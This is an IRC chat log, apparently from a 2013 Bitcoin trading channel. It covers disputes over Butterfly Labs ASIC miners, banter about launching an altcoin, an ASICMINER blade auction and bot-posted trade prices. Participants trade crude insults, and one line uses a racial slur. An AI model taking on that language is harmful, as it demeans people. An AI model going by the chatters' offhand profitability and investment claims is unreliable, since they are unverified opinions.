run off the field of view Apr 29 18:19:42 mircea_popescu: hows this, pay me a thousand BTC, Ill just create a better coin Apr 29 18:19:50 eh but why. Apr 29 18:19:58 lippoper1: too bad, I don't have the time to get anywhere near that clean Apr 29 18:19:59 hey i got beard on my neck Apr 29 18:20:03 this one is fine. so various idiots inexplicably think they matter in the contexrt. so ? Apr 29 18:20:04 hahaha Apr 29 18:20:05 he wants BTC to create non-btc, hrm Apr 29 18:20:05 because BFL morons wont be able to mine on it. Apr 29 18:20:17 ThickAsThieves: mircea_popescu has more BTC than dollars. Apr 29 18:20:23 i just want to see a non edited video of the thing in action Apr 29 18:20:37 i'm skeptical that mp doesnt have plenty fiat to match Apr 29 18:20:38 lippoper1: there's plenty of those on the web now Apr 29 18:20:41 and you follow the cables, haven't seen that in any of the 'unboxing' and whatnot videos Apr 29 18:20:52 you went to BFL right? Apr 29 18:20:59 lippoper1: enmaku even has a teardown video Apr 29 18:21:02 in exchange they gave you an ASIC? Apr 29 18:21:09 Luke-Jr: then by all means, post the fucking URL. Apr 29 18:21:17 lippoper1: I bought my ASICs. Apr 29 18:21:40 Diablo-D3: screw you, learn to google Apr 29 18:21:41 [BTCTC] [COGNITIVE] 1 @ 0.199199 BTC [-] Apr 29 18:21:41 sure, but yet you don't have any proof of it Apr 29 18:21:45 http://www.youtube.com/watch?v=_6mmTRheUzg WARNING: neckbeard Apr 29 18:21:50 wtf bud Apr 29 18:21:52 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] Apr 29 18:21:54 [BTCTC] [COGNITIVE] 1 @ 0.1992 BTC [+] Apr 29 18:21:56 Luke-Jr: but you're the one claiming it exists Apr 29 18:22:09 Diablo-D3: it does. proving it to you is not my problem. Apr 29 18:22:14 bwhahaha Apr 29 18:22:16 hahahaha Apr 29 18:22:20 Nice Christian attitude there, bud. Apr 29 18:22:21 I couldn't care less if you believe it or not. Apr 29 18:22:28 I have a Litecoin ASIC miner Apr 29 18:22:37 yeah it does 28GH/s Apr 29 18:22:38 dude, I have a DiabloCoin ASIC miner Apr 29 18:22:44 and I havent even written DiabloCoin yet Apr 29 18:22:51 oh you don't believe me, that's too bad, it's not my burden to provide you proof Apr 29 18:22:56 its a sad ASIC :< Apr 29 18:23:07 Micon trusts this video Apr 29 18:23:15 lippoper1: yep, I don't believe you. too bad. Apr 29 18:23:20 you know what, it is lunch time Apr 29 18:23:30 fine Luke-Jr., I don't have to prove it to you Apr 29 18:23:37 nope, you don't. Apr 29 18:23:46 I'll just go on not believing you. Apr 29 18:23:48 the youtube i posted is an unboxing btw Apr 29 18:23:48 but don't call me a liar or a scam artist for taking everyone's money for it Apr 29 18:24:04 mircea_popescu: you know whats funny? Apr 29 18:24:24 lippoper1: the difference is, the proof of BFL's ASICs exists. Diablo-D3 is just too lazy to look in obvious places for it Apr 29 18:24:28 mircea_popescu: I wrote DiabloMiner, con ported it to C as cgminer, then Luke-Jr forked it because con didnt want to merge his shitty patches Apr 29 18:24:36 I've looked at the so called proof Apr 29 18:24:42 lol, you wish Diablo-D3 Apr 29 18:24:42 mircea_popescu: in other words, Luke-Jr's only fame relies on code I wrote. Apr 29 18:24:50 i don't believe it, because they have hidden cables running behind the fucking laptop Apr 29 18:25:04 ya well. the hope is that after another decade or so of getting people coffee he learns to code. Apr 29 18:25:14 mircea_popescu: that will probably never happen Apr 29 18:25:14 lippoper1: fine, then don't believe it. your problem, not mine. Apr 29 18:25:18 supposedly this happens Apr 29 18:25:22 mircea_popescu: really, the best programmers in the world all started young Apr 29 18:25:23 either wya, it doesn't bother me one bit Apr 29 18:25:24 am i still a neckbard if i shave, just like you can be a chinese and a nigger. Apr 29 18:25:26 its too late for him Apr 29 18:25:30 hes like, what, 40? Apr 29 18:25:39 kakobrekla the neckbeard is inside not outside Apr 29 18:25:44 I'm 28, and have been programming since 6 or 7 Apr 29 18:26:05 so why the fuck do you still suck at it? Apr 29 18:26:10 how long since you've not been taking your pills would be more interesting. Apr 29 18:26:19 mp, didnt know you host a talkshow for neckbeards :( Apr 29 18:26:23 mircea_popescu: ask luke about the catholic church Apr 29 18:26:29 mircea_popescu: only delusional people such as yourself have pills Apr 29 18:26:30 ezdiy anything to survive in this tough makret Apr 29 18:26:42 I KNOW WHAT YOU ARE, BUT WHAT AM I Apr 29 18:26:55 Diablo-D3 the neckbeard argument university. Apr 29 18:27:08 mircea_popescu: he must have a fucking phd in that Apr 29 18:27:54 why did you stop? Apr 29 18:28:29 ok, Diablo-D3, since you're amazing and all, can we start DiabloCoin? Apr 29 18:28:34 [BTCTC] [S.MPOE-PT] 2 @ 0.000651 = 0.0013 BTC [+] Apr 29 18:28:37 Scrat out of mountain dew. Apr 29 18:28:38 make it SHA-512 or something Apr 29 18:28:44 sd3 not even 50 Apr 29 18:28:47 lippoper1: no, probably Ill use scrypt correctly Apr 29 18:28:51 d3 not even 50 lol Apr 29 18:29:13 mircea_popescu: don't think there are any rednecks here Apr 29 18:29:17 proof litecoin sucks dick: you can mine it on gpus. Apr 29 18:29:42 lippoper1: I've been saying this for months... someone with a clue needs to start an altcoin Apr 29 18:29:55 might as well be diablocoin Apr 29 18:30:14 Scrat: Im seriously considering it Apr 29 18:30:21 Im just not sure I want to sink that much time into it Apr 29 18:30:30 jalepeno teardown http://www.youtube.com/watch?v=ciwfCqP8AiU Apr 29 18:30:34 yeah the bitcoin is too mainstream Apr 29 18:30:39 warning more neckbeard Apr 29 18:30:41 must get out. Apr 29 18:31:03 yeah Apr 29 18:31:06 we need a better altcoin Apr 29 18:31:08 neckbeard jumped from big guy to new guy Apr 29 18:31:17 looool Apr 29 18:31:20 so Im thinking possibly rust Apr 29 18:31:28 I really want to try it out Apr 29 18:31:32 scrypt is cool but can't we just mine that with GPUs now? Apr 29 18:31:44 lippoper1: no, litecoin uses scrypt wrong Apr 29 18:31:48 which is very dangerous Apr 29 18:31:58 NVC is the same way Apr 29 18:32:01 can be gpu mined Apr 29 18:32:04 using scrypt Apr 29 18:32:08 I thought nvc was sha256? Apr 29 18:32:33 but yeah, I want to see a return of cpu mining Apr 29 18:32:33 NovaCoin scrypt Apr 29 18:32:48 make gpus, fpgas, and asics impossible for the long term Apr 29 18:33:02 BFL Bitcoin ASIC Teardown, related: How to make caramel Apr 29 18:33:07 gotta love youtube Apr 29 18:33:25 Diablo-D3: timekoin >:) Apr 29 18:33:37 ezdiy: but only the Doctor would have a use for that Apr 29 18:33:41 hehe Apr 29 18:33:50 17:32 < Diablo-D3> make gpus, fpgas, and asics impossible for the long term Apr 29 18:33:53 fills the bill tho Apr 29 18:33:59 most important thing about a new coin is a good name Apr 29 18:34:03 lippoper1: you should use my altcoin Apr 29 18:34:08 Im probably going to name it after a planet Apr 29 18:34:10 ThickAsThieves: newcoin isn't taken yet Apr 29 18:34:16 probably something lol like MarsCoin Apr 29 18:34:17 luke you have an alt coin? Apr 29 18:34:19 Luke-Jr: Whats the name of your altcoin? Apr 29 18:34:23 trollcoin? Apr 29 18:34:29 software written explicitly for upcoming mars colonization missions Apr 29 18:34:35 newcoin is okay Apr 29 18:34:35 Luke-Jr uses religious names Apr 29 18:34:36 so um Apr 29 18:34:38 lacks sex Apr 29 18:34:41 Chaang-Noi: yep, the very first one ever Apr 29 18:34:44 ezdiy: I should too Apr 29 18:34:45 JESUSCOIN Apr 29 18:34:47 newsexcoin Apr 29 18:34:50 NOW WITH EXTRA CROSS Apr 29 18:34:52 Chaang-Noi: Tonal bitcoin Apr 29 18:34:58 oh right Apr 29 18:35:01 Luke-Jr: lol Apr 29 18:35:10 oh and btw Apr 29 18:35:15 theres one change Im making Apr 29 18:35:25 rewards will be low and never decrease Apr 29 18:35:29 decepticoin Apr 29 18:35:35 aww, cute: Apr 29 18:35:36 [2013/04/29 10:07:45] <+gribble> Rating change | Old rating 1 | New rating: luke-jr > -1 > diablo-d3 | I advanced him 8 BTC in exchange for 16 BTC worth of shares in the DMC IPO. But in conversation lately, he's been exceedingly dishonest, so I dunno.. Apr 29 18:35:36 [2013/04/29 10:10:56] <+gribble> New rating | Diablo-D3 > -10 > Luke-Jr | Known troll. Apr 29 18:35:45 hahaha Apr 29 18:35:50 imsaguy: yeah, and luke still owns those DMC shares too Apr 29 18:35:57 autocoin Apr 29 18:36:03 primecoin Apr 29 18:36:10 name: GigaCoin Apr 29 18:36:14 actually, lets just call it peniscoin Apr 29 18:36:19 metacoin Apr 29 18:36:26 if we're going to troll, might as well push it up to 11 Apr 29 18:36:26 BetaCoin Apr 29 18:36:37 Lukecoin Apr 29 18:36:42 but yeah, we clearly need a silver to go with bitcoin's gold Apr 29 18:36:44 LipCoin Apr 29 18:36:51 Diablo-D3: Litecoin Apr 29 18:36:58 litecoin is largely a failure Apr 29 18:37:05 it never took off and it has no value Apr 29 18:37:06 And we definitely need a Baryllium to the silver and gold coins Apr 29 18:37:07 wagnercoin :P Apr 29 18:37:10 i think you need decent following to start a coin, so basically only contenders are RpiCoin and MPCoin Apr 29 18:37:16 cybercoin Apr 29 18:37:25 litecoin is crap Apr 29 18:37:27 do we even need coin in the name? Apr 29 18:37:31 no Apr 29 18:37:32 but Apr 29 18:37:33 it's failing miserably right now Apr 29 18:37:36 just call it Saturn Apr 29 18:37:41 No Apr 29 18:37:44 Call it pluto Apr 29 18:37:44 it might help in borrowing from bitcoins brand Apr 29 18:37:47 each "coin" is a ring. Apr 29 18:37:56 OH LOOK WHAT I DID THAR Apr 29 18:38:04 Im a bad bad person. Apr 29 18:38:29 hashlings Apr 29 18:38:35 fucking korea Apr 29 18:39:01 cryptobits Apr 29 18:39:09 taste great with milk! Apr 29 18:39:24 cereal killer. Apr 29 18:39:41 digigold Apr 29 18:40:00 [MPEX] [S.MPOE] 11302 @ 0.00068056 = 7.6917 BTC [-] Apr 29 18:40:10 https://www.youtube.com/watch?v=enZ4P7Azxys Apr 29 18:40:25 hehe Apr 29 18:41:05 it's even in stereo Apr 29 18:41:06 fancy Apr 29 18:41:42 that guy has lots of nifty shit Apr 29 18:41:51 doom e1m1 is good too Apr 29 18:42:27 so Im thinking Apr 29 18:42:41 constant inflation, but the % of inflation decreases over time Apr 29 18:43:25 ALTERA Apr 29 18:43:34 use of network coding techniques to decrease the time of data dissemination Apr 29 18:43:52 http://www.youtube.com/watch?feature=player_detailpage&v=ciwfCqP8AiU#t=597s Apr 29 18:47:45 Its a scam Apr 29 18:47:56 I think we already covered that Apr 29 18:47:58 yeah Apr 29 18:48:02 it's the only unit in the wild Apr 29 18:48:15 [BTCTC] [ASICMINER-PT] 1 @ 1.2785 BTC [+] Apr 29 18:48:38 hrm Apr 29 18:48:40 its lunch time Apr 29 18:48:50 not sure what I want to eat Apr 29 18:50:16 cat Apr 29 18:50:20 [BTCTC] [ASICMINER-PT] 1 @ 1.2787 BTC [+] Apr 29 18:50:43 imsaguy: no, I save eating pussy for dessert. Apr 29 18:50:43 So what happens when bfl finally starts shipping in any sort of recognizable quantity Apr 29 18:50:52 will it kill asicminer? Apr 29 18:51:00 since their tech is newer Apr 29 18:51:22 brb xchat is fucking up Apr 29 18:52:22 this is not a tech race (yet) more a delivery time race Apr 29 18:52:38 and bfl lost ^^ Apr 29 18:52:39 [11:50:53] will it kill asicminer? Apr 29 18:52:42 er, how does it kill asicminer? Apr 29 18:52:52 asicminer will have 200th in customer's hands before bfl starts shipping en masse Apr 29 18:53:01 if anything, BFL might as well just declare bankruptcy right now Apr 29 18:53:05 AM also has a lot of money to play with Apr 29 18:53:09 yes Apr 29 18:53:11 LOTS of money Apr 29 18:53:22 and they're already working on a next generation process Apr 29 18:53:23 er Apr 29 18:53:27 I shouldnt have said that. Apr 29 18:53:35 friedcat is going to be mad with me now =/ Apr 29 18:53:49 INSIDER TRADING :> Apr 29 18:54:18 Well, they'd be stupid to not be working on a next generation process Apr 29 18:55:00 seriously Diablo, you need to make the new altcoin Apr 29 18:55:08 will you guys buy alibaba stocks? Apr 29 18:55:19 please put Feathercoin out of its misery Apr 29 18:55:28 wtf is feathercoin anyhow Apr 29 18:55:31 I keep hearing people talk about that Apr 29 18:55:41 some ahole, made a litecoin clone Apr 29 18:55:46 with 4x the coins Apr 29 18:55:49 that's it Apr 29 18:56:08 there is no improvement or anything else to it. Apr 29 18:56:25 what. Apr 29 18:56:49 yes, that's why i'm serious about you making a serious altcoin Apr 29 18:57:11 with the support of the community and some actual improvements over what litecoin does now, i think it would take off eventually Apr 29 18:57:33 these clones of litecoin like feathercoin/novacoin are a joke to me Apr 29 18:59:08 butterflylabs support forum golden quote of the day: "at this point I think it's safe to expect my jalapeno could arrive around the same time as the rapture and the second coming of Christ." Apr 29 19:00:08 http://benhohner.com/feathercoin/ Apr 29 19:00:17 http://feathercoin.com/ Apr 29 19:00:48 if you want a good altcoin, you need a good name, minimal pre-mining, GPU mining, and support from at least one decent exchange Apr 29 19:00:50 http://feathercoin.com/about/ Apr 29 19:01:21 Exchange: http://cryptonit.net/exchange/ltc/ftc Apr 29 19:01:28 lippoper1: you know whats funny? the rapture is not supported by the bible Apr 29 19:01:31 Luke-Jr: if BFL is real, why no one buys difficulty future anymore? Apr 29 19:01:36 it also wouldnt hurt to ding the confidence of litecoin somehow Apr 29 19:01:38 with your new coin Apr 29 19:02:49 jurov, could also be your pricing Apr 29 19:03:14 hahaha Apr 29 19:03:32 the prices are below bfl pudits estimations. Apr 29 19:03:42 or, let's agree about collateral and undercut me, go on Apr 29 19:04:07 i'd be safer posting futures on mpex, no? Apr 29 19:04:23 stupid waiting game Apr 29 19:04:25 ;;ticker Apr 29 19:04:25 BTCUSD ticker | Best bid: 143.95000, Best ask: 143.96799, Bid-ask spread: 0.01799, Last trade: 143.96800, 24 hour volume: 65651.97862618, 24 hour low: 131.52300, 24 hour high: 149.08000, 24 hour vwap: 140.87244 Apr 29 19:05:07 ThickAsThieves, they are covered only up to 0.14 btc (no one knows for sure, tho) Apr 29 19:05:33 so, not so much attractive Apr 29 19:05:40 i'm not saying your pricing is unreasonable, so much as priced perfectly above the likely hashrate Apr 29 19:05:53 you do well with your estimations Apr 29 19:06:05 lol @ bfl quote Apr 29 19:06:35 ;;bc,stats Apr 29 19:06:38 Current Blocks: 233770 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 85 blocks | Next Difficulty In About: 11 hours, 20 minutes, and 0 seconds | Next Difficulty Estimate: 10068449.7588 | Estimated Percent Change: 12.19208 Apr 29 19:06:48 ;;estimate Apr 29 19:06:49 Next difficulty estimate | 10068449.7588 based on data since last change | 10600052.17 based on data for last three days Apr 29 19:09:47 ;;ticker Apr 29 19:09:47 BTCUSD ticker | Best bid: 143.80000, Best ask: 143.92220, Bid-ask spread: 0.12220, Last trade: 143.80000, 24 hour volume: 65712.09897859, 24 hour low: 131.52300, 24 hour high: 149.08000, 24 hour vwap: 140.88260 Apr 29 19:11:02 [HAVELOCK] [SDICE] 10 @ 0.32 = 3.2 BTC [-] Apr 29 19:11:09 http://organofcorti.blogspot.com/2013/04/914-asic-earnings-23-april-2013.html says difficulty can be 40m on June 19 Apr 29 19:11:52 unfortunately his predications have rarely worked out Apr 29 19:11:53 and i'm selling iDiff-E for 26m satoshi only Apr 29 19:12:11 he keeps assuming people will ship ;) Apr 29 19:13:38 shhhh ThickAsThieves Apr 29 19:13:44 :) Apr 29 19:15:10 there will be a about 5 diff changes before the 19th (excluding tomorrow's maybe) Apr 29 19:15:19 even if diff goes up 20% each time Apr 29 19:15:25 you still dont hit 26 Apr 29 19:15:56 depends on how many diffs Apr 29 19:16:07 if it actually went up 20% Apr 29 19:16:12 we might get more Apr 29 19:16:17 not gonna bother with the math Apr 29 19:23:24 yes, i'll prolly update it tomorrow Apr 29 19:27:36 http://trilema.com/2013/the-future-of-bitcoin-regulation/ Apr 29 19:27:42 Chilca asciilifeform ^ Apr 29 19:28:08 mircea_popescu: good morning Apr 29 19:28:30 heya. Apr 29 19:28:51 do not understand what you sent me Apr 29 19:28:53 !ticker h vtx Apr 29 19:28:55 [HAVELOCK:VTX] 1D: 0.43990000 / 0.467525 / 0.48200000 (144 shares, 67.32360002 BTC), 7D: 0.40001000 / 0.45536846 / 0.49750000 (1346 shares, 612.92594387 BTC), 30D: 0.18000000 / 0.40162429 / 0.61488800 (6309 shares, 2533.84767053 BTC) Apr 29 19:29:15 http://trade.plus500.com lists bitcoin now, with 1:4 leverage Apr 29 19:29:24 hi mircea Apr 29 19:29:33 heya Apr 29 19:29:40 Chilca i figure it's an article you'll enjoy. Apr 29 19:29:48 line above. Apr 29 19:30:02 mircea_popescu: Great, will read it now!! thanks for share it. Apr 29 19:30:31 jurov remarkable, i see a romanian page. Apr 29 19:30:38 what's this like a poker site ? Apr 29 19:31:02 trying to figure out, did not use it before Apr 29 19:31:41 i see a slovenian page Apr 29 19:32:51 [MPEX] [S.MPOE] 648 @ 0.00067673 = 0.4385 BTC [-] Apr 29 19:35:01 [HAVELOCK] [HIM] 1 @ 1.7799 BTC [+] Apr 29 19:35:01 it's multinational, CFDs trading. Apr 29 19:35:23 [MPEX] [S.MPOE] 16019 @ 0.00068914 = 11.0393 BTC [+] Apr 29 19:35:25 [MPEX] [S.MPOE] 43417 @ 0.0007083 = 30.7523 BTC [+] Apr 29 19:35:28 [MPEX] [S.MPOE] 23566 @ 0.00071 = 16.7319 BTC [+] Apr 29 19:36:02 [HAVELOCK] [HIM] 2 @ 1.8 = 3.6 BTC [+] Apr 29 19:36:45 hm Apr 29 19:36:49 i dont see it Apr 29 19:36:53 jurov in their interface Apr 29 19:36:57 search for it Apr 29 19:37:25 aha Apr 29 19:37:27 [MPEX] [S.MPOE] 86998 @ 0.00071 = 61.7686 BTC [+] Apr 29 19:37:56 aha Apr 29 19:38:00 they close the market for 1h Apr 29 19:39:58 [MPEX] [S.MPOE] 5000 @ 0.00071488 = 3.5744 BTC [+] Apr 29 19:40:00 [MPEX] [S.MPOE] 6723 @ 0.000715 = 4.8069 BTC [+] Apr 29 19:40:02 [MPEX] [S.MPOE] 4353 @ 0.00071588 = 3.1162 BTC [+] Apr 29 19:40:07 [MPEX] [S.MPOE] 17700 @ 0.00071598 = 12.6728 BTC [+] Apr 29 19:40:08 [MPEX] [S.MPOE] 5546 @ 0.00071609 = 3.9714 BTC [+] Apr 29 19:40:12 [MPEX] [S.MPOE] 1400 @ 0.00071814 = 1.0054 BTC [+] Apr 29 19:40:14 [MPEX] [S.MPOE] 25000 @ 0.00072 = 18 BTC [+] Apr 29 19:50:06 [HAVELOCK] [SDICE] 1 @ 0.33479999 BTC [+] Apr 29 19:51:02 http://www.trueactivist.com/frackin-reserve-a-fractional-reserve-banking-simulator/ Apr 29 19:51:02 [HAVELOCK] [VTX] 2 @ 0.492 = 0.984 BTC [+] Apr 29 19:51:29 [BTCTC] [ASICMINER-PT] 1 @ 1.2769 BTC [-] Apr 29 19:52:29 [MPEX] [S.MPOE] 8200 @ 0.00072 = 5.904 BTC [+] Apr 29 19:53:42 why does mpoe have so much buying and selling action all the time? Apr 29 19:56:54 [BTCTC] [ASICMINER-PT] 1 @ 1.277 BTC [+] Apr 29 19:57:01 [MPEX] [O.USD.C134T] 10 @ 0.36831645 = 3.6832 BTC [+] Apr 29 19:58:16 https://bitcointalk.org/index.php?topic=188735.msg1976963#msg1976963 Apr 29 19:58:18 bbl Apr 29 19:59:08 [MPEX] [O.USD.P143T] 5 @ 0.49704849 = 2.4852 BTC [+] Apr 29 20:01:53 [MPEX] [S.MPOE] 29479 @ 0.00072 = 21.2249 BTC [+] Apr 29 20:04:08 [BTCTC] [S.MPOE-PT] 463 @ 0.000651 = 0.3014 BTC [+] Apr 29 20:05:28 [BTCTC] [GSDPT] 27 @ 0.003 = 0.081 BTC [-] Apr 29 20:15:54 not sure how that would benefit him Apr 29 20:15:59 it stays in a range Apr 29 20:16:00 so Apr 29 20:16:04 about an hour until the auction is done Apr 29 20:16:16 I still may consider bidding on a single unit Apr 29 20:16:30 lotsa snipes last time, right? Apr 29 20:17:03 kakobrekla lol win. Apr 29 20:17:27 ThickAsThieves: LOTS of snipes last time Apr 29 20:17:31 it traveled like 10btc last time Apr 29 20:17:40 how much did it close for ? Apr 29 20:18:03 last time, like 74ish each i think Apr 29 20:18:06 yeah Apr 29 20:18:12 it was above 70 for all of the 10 boards Apr 29 20:18:20 " changing your pass w/o the need of need to know the current one" da fuck ?! Apr 29 20:18:23 can i change yours ? Apr 29 20:18:27 wtf xchat, brb Apr 29 20:19:03 but yeah Apr 29 20:19:08 it'll probably clear 50 Apr 29 20:19:13 I think it might make it into the 60s Apr 29 20:19:18 but dunno Apr 29 20:20:58 i like how he's including a free rack with purchase of 10 Apr 29 20:21:15 firedcat was all like OMG when he saw those guys running theirs flat on a table Apr 29 20:23:39 [MPEX] [S.MPOE] 11254 @ 0.00072 = 8.1029 BTC [+] Apr 29 20:24:02 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 29 20:26:57 link please Apr 29 20:29:10 [MPEX] [S.MPOE] 100000 @ 0.00072 = 72 BTC [+] Apr 29 20:29:37 ThickAsThieves: actually, that was because of me Apr 29 20:29:54 I said in the thread I'd consider continued bidding if I get a rack if I bid on 10 Apr 29 20:30:00 [HAVELOCK] [SDICE] 10 @ 0.32 = 3.2 BTC [-] Apr 29 20:30:03 nice Apr 29 20:31:07 but prices are just way beyond what Im willing to bid on Apr 29 20:31:08 ok take those $70k but give me a rack Apr 29 20:31:11 seems legit Apr 29 20:31:12 ;;ticker Apr 29 20:31:12 BTCUSD ticker | Best bid: 141.27000, Best ask: 141.30000, Bid-ask spread: 0.03000, Last trade: 141.27000, 24 hour volume: 68300.17959196, 24 hour low: 131.52300, 24 hour high: 149.08000, 24 hour vwap: 141.22923 Apr 29 20:31:27 $depth O.USD.C141T Apr 29 20:31:29 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 29 20:31:41 $depth O.USD.C140T Apr 29 20:31:42 mircea_popescu: O.USD.C140T Bids: ['1000 @ 0.16376342', '1000 @ 0.16376342', '1000 @ 0.16376342'] Apr 29 20:31:43 mircea_popescu: Asks: ['1000 @ 0.33695048', '1000 @ 0.33695048', '1000 @ 0.33695048'] Apr 29 20:33:49 how did this happen: [08:58] <@assbot> [MPEX] [O.USD.C140T] 200 @ 0.14768654 = 29.5373 BTC [-] Apr 29 20:34:37 Diablo what auction, what's for sale? Apr 29 20:34:38 shorting i guess Apr 29 20:34:50 a true asic miner? Apr 29 20:34:57 yes Apr 29 20:35:02 asicminer is selling more blades Apr 29 20:35:26 https://bitcointalk.org/index.php?topic=189248 Apr 29 20:37:25 Bang With Friends, the popular app that helps facilitate one-night stands with your Facebook friends, is reportedly raising a ~$1 million seed round, according to Business Insider. Apr 29 20:37:26 sigh. Apr 29 20:38:17 7. Is the blades compatible with P2Pool? Apr 29 20:38:18 Our blades implements only the diff 1 getwork protocol. So p2pool is possible, but should be with proxies. Apr 29 20:38:31 Wtf, does that mean it doesn't support stratum ;-) Apr 29 20:40:35 yup Apr 29 20:41:09 https://twitter.com/jonmatonis/status/328926763809918977 Apr 29 20:41:10 heh. Apr 29 20:43:03 wow Apr 29 20:43:09 nice Apr 29 20:43:11 cheapest blade available is at 41.5/42 Apr 29 20:43:14 btc Apr 29 20:43:16 each Apr 29 20:43:22 and they only put out 5gh/s Apr 29 20:43:24 each Apr 29 20:43:48 $5,880.00 a blade cheapest Apr 29 20:43:52 buahahaha Apr 29 20:43:56 wait, wasn't it 10ghs ? Apr 29 20:44:00 that's like a lifetime to break even Apr 29 20:44:25 yea each blade is 10gh Apr 29 20:44:26 not 5 Apr 29 20:44:30 ohhh Apr 29 20:45:04 https://bitcointalk.org/index.php?topic=163741.msg1974451#msg1974451 girl telling noob "you are the problem with bitcoin". priceless. Apr 29 20:45:38 wow Apr 29 20:45:52 only 3 months to pay off if network difficulty remained the same Apr 29 20:48:01 [HAVELOCK] [VTX] 5 @ 0.4554 = 2.277 BTC [-] Apr 29 20:49:21 ;;genrate 10000 Apr 29 20:49:22 The expected generation output, at 10000.0 Mhps, given difficulty of 8974296.01489, is 0.560385478255 BTC per day and 0.0233493949273 BTC per hour. Apr 29 20:51:09 ;;calc 0.0233493949273 * 140.56 Apr 29 20:51:09 3.28199095098 Apr 29 20:51:17 per hour Apr 29 20:51:40 if they are lucky each blade will do 25btc in 2mos Apr 29 20:51:56 if they are really lucky diff drops Apr 29 20:52:51 after 2mos, things will probly get pretty ugly Apr 29 20:53:01 ;;estimate Apr 29 20:53:01 The next auction's most probably on USB stick miners, in a week. (the 300mhz type. Tongue) Apr 29 20:53:01 Be rest assured that the blades aren't coming again so soon. Smiley Apr 29 20:53:02 Next difficulty estimate | 10099802.9685 based on data since last change | 10607627.5042 based on data for last three days Apr 29 20:53:17 quote from john Apr 29 20:53:34 [MPEX] [S.MPOE] 8208 @ 0.00072 = 5.9098 BTC [+] Apr 29 20:53:35 ;;genrate 10000 10099803 Apr 29 20:53:36 The expected generation output, at 10000.0 Mhps, given difficulty of 10099803.0, is 0.497936956227 BTC per day and 0.0207473731761 BTC per hour. Apr 29 20:54:35 Diablo-D3: are you buying some blades? seems pricey at only 10GH for 45+ BTC Apr 29 20:54:49 topace: I have no active bids on that Apr 29 20:55:36 very politically correct answer... Apr 29 20:55:36 going to bid with 3 seconds to spare? :p Apr 29 20:56:12 nope Apr 29 20:56:14 too high Apr 29 20:56:18 my threshold was 30 BTC Apr 29 20:56:43 heh mine was 40 :( Apr 29 20:57:01 half hour left on asicminer blade auction https://bitcointalk.org/index.php?topic=189248.660 Apr 29 20:59:06 mine was like 4.5 Apr 29 20:59:15 [BTCTC] [ASICMINER-PT] 1 @ 1.276334 BTC [-] Apr 29 20:59:42 I could reasonably make back 30 BTC in 2 months no matter how fast BFL ships units Apr 29 20:59:49 any more than that probably not Apr 29 21:00:15 [MPEX] [S.MPOE] 25000 @ 0.00072 = 18 BTC [+] Apr 29 21:00:53 waitll you see how absurd budding gets for the USB miners Apr 29 21:00:59 bidding* Apr 29 21:02:04 [BTCTC] [S.DICE-PT] 37 @ 0.00338 = 0.1251 BTC [+] Apr 29 21:02:15 ThickAsThieves: well, with those Apr 29 21:02:31 I wonder if anyone makes a powered usb hub that can handle high power requirements Apr 29 21:02:50 i think one has been linked before Apr 29 21:03:08 but watch, people will pay like 5-8btc ea Apr 29 21:03:12 [MPEX] [S.MPOE] 8318 @ 0.00072251 = 6.0098 BTC [+] Apr 29 21:03:47 they're entirely USB powered so Apr 29 21:03:57 each one uses 2.5 watts Apr 29 21:04:05 or 0.5 amps Apr 29 21:05:08 ThickAsThieves: those I'd probably do a blanket bid on all of them 1 BTC each Apr 29 21:05:24 not gonna be nearly enough Apr 29 21:05:45 so many people want one Apr 29 21:05:52 I have 487 BTC. Apr 29 21:06:23 http://www.newertech.com/products/7_port_powered_usb2_hub.php Apr 29 21:06:24 hrm Apr 29 21:07:02 kakobrekla https://bitcointalk.org/index.php?topic=191018.msg1977536#msg1977536 lol Apr 29 21:07:17 oh so now we delete the fuckups Apr 29 21:07:20 that does 0.5 amps per plug for all 7 Apr 29 21:07:22 that works. Apr 29 21:07:59 guy was funny lol Apr 29 21:08:05 https://www.thinkgeek.com/product/cef0/ Apr 29 21:08:18 4.5 amps Apr 29 21:08:23 so not enough for 16 Apr 29 21:10:41 65745 Apr 29 21:12:37 [MPEX] [S.MPOE] 25000 @ 0.000725 = 18.125 BTC [+] Apr 29 21:21:26 auction has crossed 50 btc. Apr 29 21:21:40 how long does friedcat usually need for a share transfer? Apr 29 21:22:12 Uglux: usually before the next dividend payment Apr 29 21:22:18 [BTCTC] [S.DICE-PT] 15 @ 0.00338 = 0.0507 BTC [+] Apr 29 21:23:06 thanks Apr 29 21:23:15 lmao 50 Apr 29 21:24:02 its the goldrush :) Apr 29 21:24:43 ddue wtf, a 10gh itam is never mining two full blocks. Apr 29 21:27:05 auction is over Apr 29 21:27:17 I think that bid for 53 made it Apr 29 21:28:34 The expected generation output, at 10000.0 Mhps, given difficulty of 8974296.01489, is 0.560385478255 BTC per day and 0.0233493949273 BTC per hour. Apr 29 21:29:42 [BTCTC] [S.DICE-PT] 100 @ 0.00338 = 0.338 BTC [+] Apr 29 21:29:47 but you get them now vs. (unknown time) with Avalon/BFL Apr 29 21:29:51 mircea_popescu: was it you that said we wouldnt cross 50? Apr 29 21:29:56 part of the price includes the certainty Apr 29 21:30:03 Diablo-D3 first off, diff is going up > 10% in a day Apr 29 21:30:14 I agree. Apr 29 21:30:20 I didnt have any active bids. Apr 29 21:30:49 http://organofcorti.blogspot.com/2013/04/915-fair-price-for-asic-miner.html Apr 29 21:31:49 Diablo-D3: I have 487 BTC. Apr 29 21:31:57 you mean 487k BTC? Apr 29 21:32:22 no, 487. Apr 29 21:33:26 no, mine. Apr 29 21:33:32 why don't you have more? Apr 29 21:33:39 did you also lose them day trading? Apr 29 21:33:41 ;-) Apr 29 21:33:42 how many shoulod he have? Apr 29 21:33:57 lippoper1: why should I have more? Apr 29 21:34:12 PsychoticBoy: no, I sold 371 shares of ASICMINER Apr 29 21:34:19 You're a great part of the community, I would just assume you probably had more than 480'ish Apr 29 21:34:26 [BTCTC] [ASICMINER-PT] 2 @ 1.276334 = 2.5527 BTC [-] Apr 29 21:34:45 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] Apr 29 21:34:48 lippoper1: I dont buy BTC, but I accept donations. Apr 29 21:35:12 well, when you make our new Alt Coin, i will donate some DiabloCoins to you Apr 29 21:35:15 loppoper1, support your community send us all donations Apr 29 21:35:39 [BTCTC] [ASICMINER-PT] 1 @ 1.2768 BTC [+] Apr 29 21:35:49 [BTCTC] [ASICMINER-PT] 1 @ 1.277 BTC [+] Apr 29 21:35:49 